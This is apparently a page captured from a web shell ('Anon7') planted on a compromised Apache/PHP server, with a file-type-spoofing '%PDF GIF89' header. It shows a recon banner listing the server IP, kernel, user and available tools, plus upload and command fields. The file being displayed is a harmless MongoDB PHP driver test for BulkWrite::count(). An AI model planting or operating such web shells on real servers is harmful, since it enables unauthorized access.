%PDF-1.7 GIF89;
shell
Server IP : 172.66.157.178  /  Your IP : 172.16.20.3
Web Server : Apache/2.4.25 (Debian)
System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : application ( 1000)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/local/lib/php/test/mongodb/tests/bulk/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /usr/local/lib/php/test/mongodb/tests/bulk/bulkwrite-count-001.phpt
--TEST--
MongoDB\Driver\BulkWrite::count() should return the number of operations
--FILE--
<?php

$bulk = new MongoDB\Driver\BulkWrite;
var_dump($bulk->count());

$bulk->insert(['x' => 1]);
var_dump($bulk->count());

$bulk->insert(['x' => 2]);
var_dump($bulk->count());

$bulk->update(['x' => 3], ['$set' => ['y' => 3]]);
var_dump($bulk->count());

$bulk->update(['x' => 4], ['$set' => ['y' => 4]]);
var_dump($bulk->count());

$bulk->delete(['x' => 5]);
var_dump($bulk->count());

$bulk->delete(['x' => 6]);
var_dump($bulk->count());

?>
===DONE===
<?php exit(0); ?>
--EXPECT--
int(0)
int(1)
int(2)
int(3)
int(4)
int(5)
int(6)
===DONE===

Anon7 - 2022
SCDN GOK